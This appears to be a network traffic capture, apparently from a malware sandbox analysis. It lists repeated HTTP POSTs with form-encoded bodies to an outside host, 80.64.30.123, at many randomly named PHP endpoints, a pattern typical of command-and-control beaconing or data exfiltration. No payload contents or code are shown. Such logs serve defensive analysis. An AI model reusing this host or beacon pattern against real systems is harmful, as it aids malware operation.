POST /php/rcd6ui7bx7r.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:07 GMT
Content-Length: 24
POST

http://80.64.30.123/php/g7gzaxgoll.php/

Remote address:

80.64.30.123:80

Request

POST /php/g7gzaxgoll.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:10 GMT
Content-Length: 24
POST

http://80.64.30.123/php/pwn.php/

Remote address:

80.64.30.123:80

Request

POST /php/pwn.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:13 GMT
Content-Length: 24
POST

http://80.64.30.123/php/3ep5uuml7b6dk7ge83b.php/

Remote address:

80.64.30.123:80

Request

POST /php/3ep5uuml7b6dk7ge83b.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:16 GMT
Content-Length: 24
POST

http://80.64.30.123/php/2bmwl8pyl6qs9.php/

Remote address:

80.64.30.123:80

Request

POST /php/2bmwl8pyl6qs9.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:19 GMT
Content-Length: 24
POST

http://80.64.30.123/php/7xlwjnwea157.php/

Remote address:

80.64.30.123:80

Request

POST /php/7xlwjnwea157.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:22 GMT
Content-Length: 24
POST

http://80.64.30.123/php/x4z1km.php/

Remote address:

80.64.30.123:80

Request

POST /php/x4z1km.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:25 GMT
Content-Length: 24
POST

http://80.64.30.123/php/hz907odi.php/

Remote address:

80.64.30.123:80

Request

POST /php/hz907odi.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:28 GMT
Content-Length: 24
POST

http://80.64.30.123/php/te49i39s7p.php/

Remote address:

80.64.30.123:80

Request

POST /php/te49i39s7p.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:31 GMT
Content-Length: 24
POST

http://80.64.30.123/php/ltnf1kld4zg8lap.php/

Remote address:

80.64.30.123:80

Request

POST /php/ltnf1kld4zg8lap.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:34 GMT
Content-Length: 24
POST

http://80.64.30.123/php/0y0ijglatm8w5.php/

Remote address:

80.64.30.123:80

Request

POST /php/0y0ijglatm8w5.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:37 GMT
Content-Length: 24
POST

http://80.64.30.123/php/d.php/

Remote address:

80.64.30.123:80

Request

POST /php/d.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:40 GMT
Content-Length: 24
POST

http://80.64.30.123/php/vgdw7zvg.php/

Remote address:

80.64.30.123:80

Request

POST /php/vgdw7zvg.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:43 GMT
Content-Length: 24
POST

http://80.64.30.123/php/j1agwuif8y4xhh8.php/

Remote address:

80.64.30.123:80

Request

POST /php/j1agwuif8y4xhh8.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:47 GMT
Content-Length: 24
POST

http://80.64.30.123/php/u6siw6smqzzje325.php/

Remote address:

80.64.30.123:80

Request

POST /php/u6siw6smqzzje325.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:50 GMT
Content-Length: 24
POST

http://80.64.30.123/php/6qreyjxsjry8rf3o.php/

Remote address:

80.64.30.123:80

Request

POST /php/6qreyjxsjry8rf3o.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:52 GMT
Content-Length: 24
POST

http://80.64.30.123/php/8t22c4dnanu9ie.php/

Remote address:

80.64.30.123:80

Request

POST /php/8t22c4dnanu9ie.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:55 GMT
Content-Length: 24
POST

http://80.64.30.123/php/de29d32pd.php/

Remote address:

80.64.30.123:80

Request

POST /php/de29d32pd.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:58 GMT
Content-Length: 24
POST

http://80.64.30.123/php/mo5jhk45bgy9.php/

Remote address:

80.64.30.123:80

Request

POST /php/mo5jhk45bgy9.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:55:01 GMT
Content-Length: 24
POST

http://80.64.30.123/php/e4rxow.php/

Remote address:

80.64.30.123:80

Request

POST /php/e4rxow.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:55:05 GMT
Content-Length: 24
POST

http://80.64.30.123/php/cneysb52n07p.php/

Remote address:

80.64.30.123:80

Request

POST /php/cneysb52n07p.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:55:08 GMT
Content-Length: 24
POST

http://80.64.30.123/php/32l.php/

Remote address:

80.64.30.123:80

Request

POST /php/32l.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:55:11 GMT
Content-Length: 88
POST

http://80.64.30.123/php/0xpa68w5eqhquv.php/

Remote address:

80.64.30.123:80

Request

POST /php/0xpa68w5eqhquv.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:55:14 GMT
Content-Length: 24
POST

http://80.64.30.123/php/ctb27.php/

Remote address:

80.64.30.123:80

Request

POST /php/ctb27.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:55:17 GMT
Content-Length: 24
POST

http://80.64.30.123/php/t581shkcnok9z.php/

Remote address:

80.64.30.123:80

Request

POST /php/t581shkcnok9z.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:55:20 GMT
Content-Length: 24
POST

http://80.64.30.123/php/e5ynasns.php/

Remote address:

80.64.30.123:80

Request

POST /php/e5ynasns.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:55:23 GMT
Content-Length: 24
POST

http://80.64.30.123/php/biwua7pkf.php/

Remote address:

80.64.30.123:80

Request

POST /php/biwua7pkf.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:55:26 GMT
Content-Length: 24
POST

http://80.64.30.123/php/5rvnb.php/

Remote address:

80.64.30.123:80

Request

POST /php/5rvnb.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:55:29 GMT
Content-Length: 24
POST

http://80.64.30.123/php/39ncqgdgj9ij3z3.php/

Remote address:

80.64.30.123:80

Request

POST /php/39ncqgdgj9ij3z3.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 195
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:53:43 GMT
Content-Length: 24
POST

http://80.64.30.123/php/bvudw8sxhjl89kiwsoi3.php/

Remote address:

80.64.30.123:80

Request

POST /php/bvudw8sxhjl89kiwsoi3.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 195
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:53:44 GMT
Content-Length: 24
POST

http://80.64.30.123/php/1.php/

Remote address:

80.64.30.123:80

Request

POST /php/1.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:55 GMT
Content-Length: 24
POST

http://80.64.30.123/php/8mb65hxl.php/

Remote address:

80.64.30.123:80

Request

POST /php/8mb65hxl.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:55:11 GMT
Content-Length: 24
POST

http://80.64.30.123/php/8.php/

Remote address:

80.64.30.123:80

Request

POST /php/8.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 219
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:53:44 GMT
Content-Length: 24
POST

http://80.64.30.123/php/9rp2t.php/

Remote address:

80.64.30.123:80

Request

POST /php/9rp2t.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 90
